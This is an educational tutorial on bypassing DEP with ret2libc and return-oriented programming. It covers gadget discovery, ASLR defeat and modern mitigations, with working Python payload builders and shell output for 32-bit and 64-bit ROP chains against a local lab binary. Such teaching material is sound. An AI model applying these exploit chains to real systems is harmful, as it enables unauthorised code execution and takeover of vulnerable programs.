Bypassing DEP with Return-Oriented Programming (ROP)
In the Linux buffer overflow tutorial and the Windows buffer overflow tutorial, we exploited stack overflows by injecting shellcode onto the stack and redirecting EIP to execute it. It worked because we disabled DEP (Data Execution Prevention).
But in the real world, DEP is on. The stack is marked as non-executable. Even if our shellcode lands perfectly in memory, the CPU refuses to execute it — the NX bit in the page table says “this is data, not code.”
So how do modern exploits achieve code execution when they can’t inject code?
The answer is Return-Oriented Programming (ROP). Instead of injecting new code, we reuse code that already exists in the process — fragments of legitimate functions in the executable and its loaded libraries. We chain these fragments together to build an arbitrary program, one instruction at a time.
ROP is the single most important technique in modern binary exploitation. If you understand ROP, you understand how real-world exploits work.
Why DEP Kills Traditional Shellcode
Let’s be clear about what DEP does. Every memory page has permission flags:
.text (code) → Read + Execute (RX)
.data (data) → Read + Write (RW)
Stack → Read + Write (RW) ← NO Execute
Heap → Read + Write (RW) ← NO Execute
When we overflow the buffer and write shellcode to the stack, it sits in an RW page. When we redirect EIP to our shellcode, the CPU checks the page permissions, sees there’s no Execute flag, and raises an access violation.
Before DEP: Stack = RWX → shellcode runs fine
After DEP: Stack = RW → "Access Violation: attempted to execute non-executable memory"
We can write anything to the stack. We just can’t execute what we write. So we need a different approach.
The Core Idea — Reusing Existing Code
Here’s the key insight: the .text section of the executable and its loaded DLLs (libc, kernel32, ntdll, etc.) are already executable. These are legitimate code pages with the Execute permission. We can’t inject new code, but we can jump to code that’s already there.
The simplest version of this is ret2libc — return to a libc function.
ret2libc — The Predecessor to ROP
Instead of returning to shellcode, we overwrite the return address with the address of a libc function — like system(). Then we arrange the stack so that system() receives the argument "/bin/sh".
The stack layout:
| buffer padding | EBP | system() addr | return after system | "/bin/sh" addr |
When the vulnerable function returns:
retpopssystem()address into EIP- CPU jumps to
system()— which is in an executable page (libc) system()reads its argument from the stack — the address of"/bin/sh"system("/bin/sh")executes — shell spawned
No shellcode needed. We just called an existing function with our own arguments.
Finding the Addresses
# Find system() address in libc
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e42da0 <__libc_system>
# Find "/bin/sh" string in libc (libc contains this string!)
(gdb) find &system, +9999999, "/bin/sh"
0xf7f588cf
# Find exit() for clean termination
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e369e0 <__GI_exit>
The Exploit
import struct
offset = 76 # padding to reach return address (varies per binary)
system_addr = struct.pack("<I", 0xf7e42da0)
exit_addr = struct.pack("<I", 0xf7e369e0)
binsh_addr = struct.pack("<I", 0xf7f588cf)
# Stack layout after overflow:
# [padding] [system()] [exit()] ["/bin/sh"]
# ^return ^argument
payload = b"A" * offset + system_addr + exit_addr + binsh_addr
with open("payload", "wb") as f:
f.write(payload)
$ (cat payload; cat) | ./vulnerable
ls
exploit.py payload vulnerable vulnerable.c
whoami
thilan
Shell spawned. No shellcode. No executable stack. DEP is still on.
Limitations of ret2libc
ret2libc works for simple cases, but it’s limited:
- You can only call whole functions
- Complex multi-step operations (like setting up a socket for a reverse shell) require chaining many function calls with carefully arranged arguments
- On x86-64, arguments are passed in registers (rdi, rsi, rdx), not the stack — so you need to control registers too
This is where ROP comes in.
Return-Oriented Programming — The Full Technique
ROP generalizes ret2libc. Instead of jumping to whole functions, we jump to small fragments of code that end with a ret instruction. These fragments are called gadgets.
What’s a Gadget?
A gadget is a short sequence of instructions ending with ret. They exist naturally throughout the executable and its libraries — they’re just the tail ends of real functions.
; Gadget 1: pop eax; ret
0x08048456: pop eax
0x08048457: ret
; Gadget 2: pop ebx; ret
0x0804862a: pop ebx
0x0804862b: ret
; Gadget 3: mov [eax], ebx; ret
0x08048734: mov dword [eax], ebx
0x08048736: ret
; Gadget 4: xor eax, eax; ret
0x08048512: xor eax, eax
0x08048514: ret
Each gadget does one small thing — pop a value into a register, move data, perform arithmetic — and then returns. The ret instruction pops the next address from the stack into EIP, jumping to the next gadget.
How ROP Chains Work
The ret instruction does one thing: pop EIP. It takes the 4-byte value at the top of the stack, puts it in EIP, and increments ESP by 4.
In a normal program, ret returns to the caller. But if we control the stack (via buffer overflow), we control what ret pops. We can make it pop any address — the address of our next gadget.
Stack (after overflow):
┌─────────────────────┐ ← ESP after first ret
│ Address of Gadget 1 │ → pop eax; ret
├─────────────────────┤
│ Value for EAX │ → popped by "pop eax"
├─────────────────────┤
│ Address of Gadget 2 │ → pop ebx; ret (popped by "ret" of Gadget 1)
├─────────────────────┤
│ Value for EBX │ → popped by "pop ebx"
├─────────────────────┤
│ Address of Gadget 3 │ → mov [eax], ebx; ret
├─────────────────────┤
│ Address of Gadget 4 │ → next operation...
├─────────────────────┤
│ ... │
└─────────────────────┘
Execution flow:
- Vulnerable function’s
retpops Gadget 1 address → jumps topop eax; ret pop eaxloads our value into EAX.retpops Gadget 2 address → jumps therepop ebxloads our value into EBX.retpops Gadget 3 address → jumps theremov [eax], ebxwrites EBX to the address in EAX.retpops next address…
Each ret acts as the “glue” between gadgets. The stack becomes our program, and each entry is either a gadget address or data.
This is Turing-complete. With enough gadgets, we can perform any computation — arithmetic, memory reads/writes, system calls, function calls. We’re building a program out of fragments of existing code.
Finding Gadgets
You don’t search for gadgets by hand. Tools do this automatically.
ROPgadget
$ ROPgadget --binary ./vulnerable
Gadgets information
============================================================
0x080485a6 : pop eax ; ret
0x080485f7 : pop ebx ; ret
0x0804861a : pop ecx ; pop edx ; ret
0x08048734 : mov dword ptr [eax], ebx ; ret
0x08048512 : xor eax, eax ; ret
0x080484f1 : inc eax ; ret
0x08048423 : int 0x80 ; ret
...
Unique gadgets found: 147
ropper
$ ropper --file ./vulnerable --search "pop eax"
[INFO] Searching for gadgets: pop eax
0x080485a6: pop eax; ret;
0x080487c3: pop eax; pop ebx; ret;
Searching in libc (many more gadgets)
$ ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 | wc -l
12847
libc alone contains thousands of useful gadgets. The more code loaded into the process, the more gadgets available.
Practical Example — execve() via ROP on Linux
Let’s build a ROP chain that calls execve("/bin/sh", NULL, NULL) — the same thing our shellcode did, but without any injected code.
On 32-bit Linux, the execve syscall requires:
EAX = 11 (syscall number for execve)
EBX = pointer to "/bin/sh"
ECX = NULL (argv)
EDX = NULL (envp)
then: int 0x80
We need to:
- Write the string “/bin/sh” somewhere in writable memory
- Set EAX = 11
- Set EBX = address of “/bin/sh”
- Set ECX = 0
- Set EDX = 0
- Execute
int 0x80
Step 1: Find Gadgets
$ ROPgadget --binary ./vulnerable --search "pop eax"
0x080485a6 : pop eax ; ret
$ ROPgadget --binary ./vulnerable --search "pop ebx"
0x080485f7 : pop ebx ; ret
$ ROPgadget --binary ./vulnerable --search "pop ecx"
0x0804861a : pop ecx ; pop edx ; ret # bonus: sets both ECX and EDX!
$ ROPgadget --binary ./vulnerable --search "int 0x80"
0x08048423 : int 0x80
Step 2: Find a Writable Location
We need somewhere to write “/bin/sh”. The .data or .bss section is writable:
$ readelf -S ./vulnerable | grep -E "\.data|\.bss"
[24] .data PROGBITS 0804a020 001020 000008 00 WA 0 0 4
[25] .bss PROGBITS 0804a028 001028 000004 00 WA 0 0 1
We’ll write to 0x0804a028 (.bss section).
Step 3: Build the Chain
import struct
p = lambda x: struct.pack("<I", x)
# Gadget addresses (found with ROPgadget)
pop_eax = 0x080485a6
pop_ebx = 0x080485f7
pop_ecx_edx = 0x0804861a
mov_eax_ebx = 0x08048734 # mov dword [eax], ebx; ret
int_0x80 = 0x08048423
xor_eax = 0x08048512 # xor eax, eax; ret
inc_eax = 0x080484f1 # inc eax; ret
writable = 0x0804a028 # .bss section
offset = 76 # padding to return address
payload = b"A" * offset
# --- Write "/bin" to .bss ---
payload += p(pop_eax)
payload += p(writable) # EAX = address to write to
payload += p(pop_ebx)
payload += b"/bin" # EBX = "/bin" (4 bytes)
payload += p(mov_eax_ebx) # write "/bin" to [.bss]
# --- Write "/sh\x00" to .bss+4 ---
payload += p(pop_eax)
payload += p(writable + 4) # EAX = .bss + 4
payload += p(pop_ebx)
payload += b"/sh\x00" # EBX = "/sh\0"
payload += p(mov_eax_ebx) # write "/sh\0" to [.bss+4]
# --- Set up registers for execve ---
payload += p(pop_ebx)
payload += p(writable) # EBX = pointer to "/bin/sh"
payload += p(pop_ecx_edx)
payload += p(0) # ECX = NULL (argv)
payload += p(0) # EDX = NULL (envp)
# --- Set EAX = 11 (execve syscall number) ---
payload += p(xor_eax) # EAX = 0
for _ in range(11):
payload += p(inc_eax) # EAX++ eleven times
# --- Trigger syscall ---
payload += p(int_0x80) # execve("/bin/sh", NULL, NULL)
with open("payload", "wb") as f:
f.write(payload)
$ (cat payload; cat) | ./vulnerable
whoami
thilan
id
uid=1000(thilan) gid=1000(thilan) groups=1000(thilan)
Shell spawned. DEP is on. No shellcode was injected. Every instruction we executed was already in the binary’s .text section. We just jumped to them in the right order.
ROP on x86-64
On 64-bit systems, function arguments go in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack. This actually makes ROP easier in some ways — we just need pop rdi; ret gadgets to set up arguments.
For calling system("/bin/sh"):
# 64-bit ROP chain
pop_rdi = 0x00400753 # pop rdi; ret (found with ROPgadget)
binsh = 0x7ffff7f588cf # address of "/bin/sh" in libc
system = 0x7ffff7e42da0 # system() in libc
exit_fn = 0x7ffff7e369e0 # exit() in libc
payload = b"A" * offset
payload += p64(pop_rdi) # pop rdi; ret
payload += p64(binsh) # rdi = "/bin/sh"
payload += p64(system) # call system("/bin/sh")
payload += p64(pop_rdi) # pop rdi; ret (clean up)
payload += p64(0) # rdi = 0
payload += p64(exit_fn) # call exit(0)
Cleaner than the 32-bit version — one gadget to set the argument, one call to system().
Stack Alignment on x86-64
On 64-bit Linux, the System V ABI requires the stack to be 16-byte aligned before a call instruction. If your ROP chain doesn’t maintain alignment, system() or other libc functions may crash with a segfault on a movaps instruction (which requires 16-byte alignment).
The fix: add a single ret gadget before the function call to adjust the stack by 8 bytes.
ret_gadget = 0x00400754 # just "ret"
payload += p64(ret_gadget) # align the stack
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
ROP on Windows
Windows ROP works the same way conceptually, but the calling convention and syscall interface differ.
On 32-bit Windows, you typically ROP into Windows API functions:
- VirtualProtect() — Change memory page permissions (make the stack executable, then jump to shellcode)
- VirtualAlloc() — Allocate a new RWX memory region, copy shellcode there, jump to it
- WriteProcessMemory() — Write shellcode to an executable region
The most common approach is to use ROP to call VirtualProtect() and make the stack executable, then jump to your shellcode normally:
ROP chain:
1. Set up arguments for VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old_protect)
2. Call VirtualProtect()
3. Stack is now executable
4. Jump to shellcode on the stack
This is called ROP to VirtualProtect — the classic Windows DEP bypass.
ASLR — The Next Challenge
We’ve bypassed DEP with ROP. But there’s another protection we’ve been ignoring: ASLR (Address Space Layout Randomization).
ASLR randomizes the base addresses of:
- The executable (if PIE — Position Independent Executable)
- Shared libraries (libc, etc.)
- The stack
- The heap
This means the gadget addresses we hardcoded change every run. Our ROP chain breaks because the gadgets aren’t where we expect them.
Defeating ASLR
ASLR is bypassed through information leaks — bugs that reveal memory addresses at runtime:
Format string vulnerabilities — printf(user_input) can leak stack contents, including return addresses and libc pointers.
Partial overwrite — ASLR on 32-bit systems only randomizes the upper bytes. The lower 12 bits of library addresses are always the same (page alignment). A 1-byte or 2-byte overwrite can redirect execution without knowing the full address.
Information disclosure bugs — Buffer over-reads, uninitialized memory, error messages containing addresses.
Brute force (32-bit only) — On 32-bit Linux, ASLR has only ~8-12 bits of entropy for libraries. That’s 256-4096 possible positions. With a forking server (that doesn’t re-randomize), you can brute-force the correct address in seconds.
The typical attack flow:
1. Exploit info leak to discover libc base address
2. Calculate gadget addresses: gadget = libc_base + known_offset
3. Build ROP chain with correct addresses
4. Send ROP chain → shell
This is why modern exploitation often requires two-stage attacks: first leak an address, then exploit.
Automated ROP Chain Generation
Building ROP chains by hand is educational but tedious. Tools can generate them automatically:
pwntools (Python)
from pwn import *
elf = ELF('./vulnerable')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
rop = ROP(elf)
# Automatically find gadgets and build a chain
rop.call('system', [next(libc.search(b'/bin/sh'))])
rop.call('exit', [0])
payload = b"A" * offset + rop.chain()
ROPgadget automatic chain
$ ROPgadget --binary ./vulnerable --ropchain
ROP chain generation
===========================================================
- Step 1 -- Write-what-where gadgets
[+] Gadget found: 0x08048734 mov dword ptr [eax], ebx ; ret
...
- Step 5 -- Syscall gadget
[+] Gadget found: 0x08048423 int 0x80
ROP chain:
p = b""
p += pack('<I', 0x080485a6) # pop eax; ret
p += pack('<I', 0x0804a028) # .bss address
...
These tools search the binary for gadgets and automatically construct chains for common operations (execve, mprotect, etc.).
Mitigations Against ROP
The security community hasn’t been standing still:
Control Flow Integrity (CFI) — Validates that indirect jumps and returns go to legitimate targets. Implemented in Clang/LLVM as CFI and in Windows as Control Flow Guard (CFG).
Shadow Stacks — A separate, protected copy of the return address. On ret, the hardware compares the stack’s return address with the shadow stack. A mismatch indicates a ROP attack. Intel CET (Control-flow Enforcement Technology) implements this in hardware.
Stack Canaries — Random values placed before the return address. Overwriting the return address also overwrites the canary, which is detected before ret executes. Doesn’t prevent ROP directly but makes traditional buffer overflow harder.
ASLR with high entropy — 64-bit ASLR has much more entropy than 32-bit, making brute force impractical. Combined with PIE (position-independent executables), every code address is randomized.
Restricted gadget availability — Compilers can be configured to reduce the number of useful gadgets by aligning returns, eliminating unnecessary code, and using alternative instruction sequences.
Despite all these mitigations, ROP remains a viable technique. Each mitigation raises the bar, but creative attackers continue to find ways around them. That’s the arms race of exploit development.
Summary
| Concept | What It Does |
|---|---|
| DEP/NX | Makes stack/heap non-executable — kills traditional shellcode |
| ret2libc | Return to libc functions — simplest DEP bypass |
| ROP | Chain gadgets (instruction fragments ending in ret) — full DEP bypass |
| Gadgets | Small instruction sequences in existing code, ending with ret |
| ROP Chain | Stack layout where each entry is a gadget address or data |
| ASLR | Randomizes addresses — requires info leak to bypass |
| Tools | ROPgadget, ropper, pwntools — automate gadget finding and chain building |
The progression of exploit development tells a story:
- Classic overflow — Inject shellcode, jump to it. Stopped by DEP.
- ret2libc — Call existing functions. Limited to whole functions.
- ROP — Chain gadgets for arbitrary computation. Bypasses DEP completely.
- ROP + info leak — Defeat ASLR by discovering addresses at runtime.
- Advanced mitigations — CFI, shadow stacks, CET. The arms race continues.
Understanding ROP is essential for both attackers and defenders. If you’re doing exploit development, it’s your primary tool. If you’re doing defense, it’s what you’re defending against.
Happy reversing!